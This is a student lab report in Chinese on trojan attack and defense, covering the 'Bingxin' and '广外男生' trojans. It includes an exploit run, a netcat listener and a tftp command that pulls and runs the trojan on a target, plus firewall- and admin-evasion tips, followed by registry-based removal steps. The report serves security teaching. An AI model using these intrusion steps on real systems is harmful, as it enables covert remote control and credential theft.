计算机网络安全实验报告07
更新时间:2023-06-10 16:53:01 阅读量: 实用文档 文档下载
网络安全
《计算机网络安全》实验报告
实验序号:7 实验项目名称:木马攻击与防范实验
网络安全
3)选择菜单“设置”->“配置服务程序” ;
4)设置访问口令为“1234567” ,其它为默认值,点击 “确定”生成木马的 服务端程序 G_SERVER.EXE。 5)将生成的木马服务程序 G_SERVER.EXE 拷贝到 tftp 服务的目录即 C:\攻防 \tftp32。
网络安全
6)运行 tftpd32.exe。保持此程序一直开启,用于等待攻击成功后传输木马 服务程序。
步骤 2:进行攻击,将木马放置在被攻击端 1)对靶机 P3 进行攻击,首先运行 nc -vv -l -p 99 接着再开一个 dos 窗口,运行 ms05039 192.168.20.23 192.168.20.1 99 1 2)攻击成功后,在运行 nc -vv -l -p 99 的 dos 窗口中出现提示,若攻击不
网络安全
成功请参照“缓冲区溢出攻击与防范实验” ,再次进行攻击。
3)在此窗口中运行 tftp -i 192.168.20.1 get g_server.exe 将木马服务程序 G_server.exe 上传到靶机 P3 上,并直接输入 g_server.exe 使之运行。
步骤 3:运行木马客户程序控制远程主机 1)打开程序端程序,单击快捷工具栏中的“添加主机”按扭,如图 8 所示。 “显示名称” :填入显示在主界面的名称“target”
网络安全
“主机地址” :填入服务器端主机的 IP 地址“192.168.20.23” 。 “访问口令” :填入每次访问主机的密码,这里输入“1234567” 。 “监听端口”“冰河”默认的监听端口是 7626,控制端可以修改它以 : 绕过防火墙。
单击“确定”按扭,即可以看到主机面上添加了主机。
这时我们就可以像操作自己的电脑一样操作远程目标电脑,比如
打开 C:\WINNT\system32\config 目录可以找到对方主机上保存用户口令的 SAM 文件。 点击鼠标右键, 可以发现有上传和下载功能。 即可以随意将虚拟机器上的机密文件 下载到本机上,也可以把恶意文件上传到该虚拟机上并运行。可见,其破坏性是巨 大的。 2) “文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号,可以
网络安全
浏览目标主机内容。 然后选中文件,在右键菜单中选中“下载文件至...” ,在弹出的对话框中选 好本地存储路径,点击“保存” 。 2) “命令控制台”使用。单击“命令控制台”的标签,弹出命令控制台界面, 验证控制的各种命令。 a. 口令类命令:展开“口令类命令” , a.1 “系统信息及口令” 可以查看远程主机的系统信息, 开机口令, 缓存口令等。 a.2 a.3 “历史口令”可以查看远程主机以往使用的口令。 “击键记录”可以记录远程主机用户击键记录,以次可以分析出远程主机
的各种帐号和口令或各种秘密信息。 b. 控制类命令:展开“控制类命令” , b.1 “捕获屏幕” 可以使控制端使用者查看远程主机的屏幕。 b.2 “发送信息” 可以向远程计算机发送 Windows 标准的各种信息。 b.3 “进程管理” 可以使控制者查看远程主机上所有的进程。单击“查看进程” 按钮,就可以看到远程主机上存在的进程,甚至还可以终止某个进程,只要选中相 应的进程,然后单击“终止进程”就可以了。 b.4 “窗口管理” 可以使远程主机上的窗口进行刷新,最大化,最小化,激活, 隐藏等。 b.5 “系统管理” 可以使远程主机进行关机,重启,重新加载“冰河” ,自动卸 载“冰河”的操作。 b.6 “鼠标控制” 可以使远程主机上的鼠标锁定在某个范围内。 b.7 “其他控制” 可以使远程主机上进行自动拨号禁止,桌面隐藏,注册表锁定 等操作。 c 网络类命令 展开“网络类命令” ,
c.1 “创建共享”在远程主机上创建自己的共享。 c.2 “删除共享”在远程主机上删除某个特定的共享。 c.3 “网络信息”可以看到远程主机上的 IPC$,C$,ADMIN$等共享。 d 文件类命令: 展开“文件类命令” ,"文件浏览", “文件查找”“文件压缩” , , “文件删除”“文件打开”等。 ,
网络安全
e 注册表读写: 展开“注册表读写” f 设置类命令: 展开“设置类命令”
步骤 4:删除“冰河”木马 删除“冰河”木马的方法: A.客户端的自动卸载功能,在“控制命令类”中的“系统控制”里面就有自 动卸载功能,执行这个功能,远程主机上的木马就自动卸载了。 B.手动卸载,查看注册表,打开 windows 注册编辑器。 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur
rentVersion\Run 如图 16。在目录中发现了一个默认的键值 C:\WINNT\System32\kernel32.exe,这 就是“冰河”木马在注册表中加入的键值,将它删除。 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices。在目录中也发现了一个默认的键值 C:\WINNT\System32\kernel32.exe, 这也是“冰河”在注册表中加入的键值,将它删除。上面两个注册表的子键目录 Run 和 Runservices 中存放的键值是系统启动时自启动的程序,一般病毒程序,木 马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。
网络安全
然后再进入 C:\WINNT\System32 目录,找到“冰河”的两个可执行文件 Kernel32.exe 和 Sysexplr.exe 文件,将它们删除。
修改文件关联也是木马常用的手段, “冰河”将 txt 文件的缺省打开方式由 notepad.exe 改为木马的启动程序,除此之外,html,exe,zip,com 等都是木马 的目标。所以,最后还需要恢复注册表中的 txt 文件关联功能,只要将注册表中的 HKEY_CLASSES_ROOT\txtfile\shell\open\command 下的默认值,改为
网络安全
C:\Windows\notpad.exe %1,即可。 这样,再次重启计算机我们就完全删除了“冰河”木马。 C.杀毒软件查杀 大部分杀毒软件都有查杀木马的功能,可以通过这个功能对主机进行全面扫 描来去除木马,就彻底把木马文件删除了。
实验任务二: 广外男生” “ 实验任务二: 广外男生”木马
1) “广外男生”的连接 运行 gwboy.exe,打开“广外男生”的主程序,主界面。
进行客户端设置。依次单击“设置”-“客户端设置” ,弹出客户端设置界面如图 21。我们可以看到它采用“反弹窗口+线程插入技术”的提示。在“客户端最大连 接数”中填入允许多少台客户端主机来控制服务器端,注意不要太多,否则容易造 成服务器端主机死机。在“客户端使用端口”填入服务器端连接到客户端的那个端 口,这是迷惑远程服务器端主机管理员和防火墙的关键,填入一些常用端口,会使 远程主机管理员和防火墙误以为连接的是个合法的程序。比如使用端口 80(此例
网络安全
中,为避免端口冲突,我们使用 1500 端口) 。选择“只允许以上地址连接”选项, 使客户端主机 IP 地址处于默认的合法控制 IP 地址池中。 (2)设置木马的连接类型,如果使用反弹端口方式二则在弹出对话框中选中 “使用 HTTP 网页 IP 通知” ;如果使用反弹端口方式一,则选择“客户处于静态 IP (固定 IP 地址)。此处我们选择后者。单击“下一步” ” ,和“完成” ,结束客户端 设置。
(4) 进行服务器端设置。 依次单击 “设置”- “生成服务器端” 这时弹出 , “广 外男生”服务器端生成向导,直接单
击“下一步” ,弹出常规设置界面。
在“EXE 文件名”和“DLL 文件名”中填入加载到远程主机系统目录下的可
网络安全
执行文件和动态链接库文件,在“注册表项目”中填入加载到远程主机注册表中的 Run 目录下的键值名。这些文件名都是相当重要的,因为这是迷惑远程主机管理员 的关键所在,如果文件名起的非常隐蔽,如 sysremote.exe, sysremote.dll,那么就 算管理员发现了这些文件也不肯定这些文件就是木马而轻易删除。注意:把“服务 器端运行时显示运行标志并允许对方退出” 前面的对勾去掉, 否则服务器端主机的 管理员就可以轻易发现自己被控制了。 (5)进行网络设置,如图 24 选择“静态 IP” ,在“客户端 IP 地址”中填入入 侵者的静态 IP 地址(即真实机 IP)“客户端用端口”填入在客户端设置中选则的 , 连接端口。
(6)生成代理文件,在“目标文件”中填入所生成服务器端程序的存放位置, 如 E:\gwboy092A\hacktest.exe,这个文件就是需要植入远程主机的木马文件。单击 “完成”即可完成服务器端程序的设置,这时就生成了一个文件名为 hacktest.exe 的可执行文件,并将该文件拷贝到虚拟机桌面上
网络安全
(7)进行客户端与服务器连接。在虚拟机上执行木马程序 hacktest.exe,等待 一段时间后客户端主机“广外男生”显示连接成功。这时,就可以和使用第 2 代木 马“冰河”一样控制远程主机,主要的控制选项有“文件共享” “远程注册表” , , “进程与服务”“远程桌面”等。 ,
手动删除“广外男生” 手动删除“广外男生”木马 “广外男生”木马除了可以采用防病毒软件查杀之外,还可以通过手动方法删除,具体手 动删除步骤如下:
网络安全
( 1 ) 依 次 单 击 “ 开 始 ” - “ 运 行 ” 输 入 regedit 进 入 注 册 表 , 依 次 展 开 到 , HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run,在里面找到 木马自启动文件进行删除。 (2)进入 C:\WINNT\System32,按文件大小进行排序,寻找 116kb 的文件。在这些文件中找 到修改时间离现在比较近的,一般就是最近所添加的文件,将 gwboy.exe 文件删除。
(3)在注册表中依次单击“编辑”-“查找” ,查找文件名为 gwboydll.dll 的文件,找到后将相关注册表项全部删除
网络安全
(4)重新启动主机,按 F8 进入带命令提示的安全模式,再进入 C:\WINNT\System32 中, 输入 del gwboydll.dll 删除木马的动态链接库文件,这样就彻底把木马文件删除了。
五、分析与讨论 通过本实验我们理解木马传播和运行的机制,掌握检查和删除木马的技 巧,学会防御木马的相关知识,加深对木马的安全防范意识。木马程序一般是由服 务器
端程序和客户端程序组成。 在该次实验中, 我成功入侵其他主机。 使我对网络安全技术有了进一步的了解, 这对以后的工作都是有相当大帮助的。
六、教师评语
成绩
签名: 日期:
正在阅读:
计算机网络安全实验报告0706-10
人民日报经典申论范文精析88篇02-26
习气了你的给予,习气了你的付出10-28
为什么做网站都建议用DIV+CSS?——丹东新思维网络分享经验03-19
电子白板安装注意事项(1)03-16
2012年上饶经开区重点课题调研提纲09-16
2015年初三中考49个考点记忆07-08
一年级主题班会活动记录03-15
- 教学能力大赛决赛获奖-教学实施报告-(完整图文版)
- 互联网+数据中心行业分析报告
- 2017上海杨浦区高三一模数学试题及答案
- 招商部差旅接待管理制度(4-25)
- 学生游玩安全注意事项
- 学生信息管理系统(文档模板供参考)
- 叉车门架有限元分析及系统设计
- 2014帮助残疾人志愿者服务情况记录
- 叶绿体中色素的提取和分离实验
- 中国食物成分表2020年最新权威完整改进版
- 推动国土资源领域生态文明建设
- 给水管道冲洗和消毒记录
- 计算机软件专业自我评价
- 高中数学必修1-5知识点归纳
- 2018-2022年中国第五代移动通信技术(5G)产业深度分析及发展前景研究报告发展趋势(目录)
- 生产车间巡查制度
- 2018版中国光热发电行业深度研究报告目录
- (通用)2019年中考数学总复习 第一章 第四节 数的开方与二次根式课件
- 2017_2018学年高中语文第二单元第4课说数课件粤教版
- 上市新药Lumateperone(卢美哌隆)合成检索总结报告
- 网络安全
- 实验
- 计算机
- 报告
- 交通安全教育计划
- 时代光华《双赢谈判》满分试卷
- 空气能热水器回水装置作用和原理、优点
- 3实验三 《体验制备细胞膜的方法》
- 黑龙江省建筑工程施工资料管理标准DB23(完整版)
- 主副井联络巷掘进面作业规程
- 山东省高密市第三中学高中英语 Unit 1 Great scientists 单元过关检测
- 2014-2015学年上学期1月联合调研
- 制图常用英语术语
- 七年级英语新目标上_Unit_1_My_name_is_Gina_单元测试题
- 功能性抗氧化肽制备与机制研究进展
- 推拿与牵引治疗神经根型颈椎病的Meta分析
- 2013年会计继续教育答案
- 欢乐谷。游玩攻略
- 初中语文教学论文 让生活走进语文课堂
- 液压机械部分培训资料1
- 从入侵检测系统到入侵防御系统
- 电子商务服装类网店策划
- 六年级英语上册单元测试听力材料及答案
- 中国海诚:2011年第一季度报告全文 2011-04-23